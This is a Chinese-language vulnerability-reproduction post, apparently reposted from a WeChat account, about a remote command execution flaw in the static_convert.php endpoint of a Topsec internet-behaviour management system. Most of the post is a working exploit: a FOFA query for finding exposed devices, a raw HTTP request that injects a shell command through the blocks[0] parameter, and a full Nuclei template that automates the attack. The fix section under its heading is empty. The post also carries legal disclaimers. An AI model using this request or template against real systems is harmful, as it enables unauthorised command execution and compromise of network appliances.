免责声明
此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们!
漏洞概述
天融信TOPSEC Static_Convert存在严重的远程命令执行漏洞。攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。强烈建议立即更新系统以修复此漏洞,确保系统安全性。
FoFa
app
=
"天融信-上网行为管理系统"
漏洞复现
GET /view/IPV6/naborTable/static_convert.php?blocks[
0
]=||%20%20echo%20
'123'
%20>%20/var/www/html/qxijtj.txt%0A HTTP/
1.1
Host:
User-Agent: Mozilla/
5.0
(Windows NT
10.0
; Win64; x64) AppleWebKit/
537.36
(KHTML, like Gecko) Chrome/
120.0
.
0
.
0
Safari/
537.36
Connection:
close
Nuclei Poc
id
: topsec-static_convert-rce
info
:
name
:
天融信TOPSEC-static_convert-远程命令执行漏洞
author
:
rain
severity
:
critical
metadata
:
:
app="天融信-上网行为管理系统"
variables
:
file_name
:
"{{to_lower(rand_text_alpha(6))}}"
file_content
:
"{{to_lower(rand_text_alpha(15))}}"
requests
:
raw:
|+
GET
/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'{{file_content}}'%20>%20/var/www/html/{{file_name}}.txt%0A HTTP/1.1
Host
:
{{Hostname}}
:
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
|
GET
/{{file_name}}.txt HTTP/1.1
Host
:
{{Hostname}}
:
Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
matchers
:
type: dsl
dsl
:
"status_code == 200 && contains(body_2, '{{file_content}}')"
修复建议
原文始发于微信公众号(知黑守白):【漏洞复现】天融信TOPSEC static_convert 远程命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论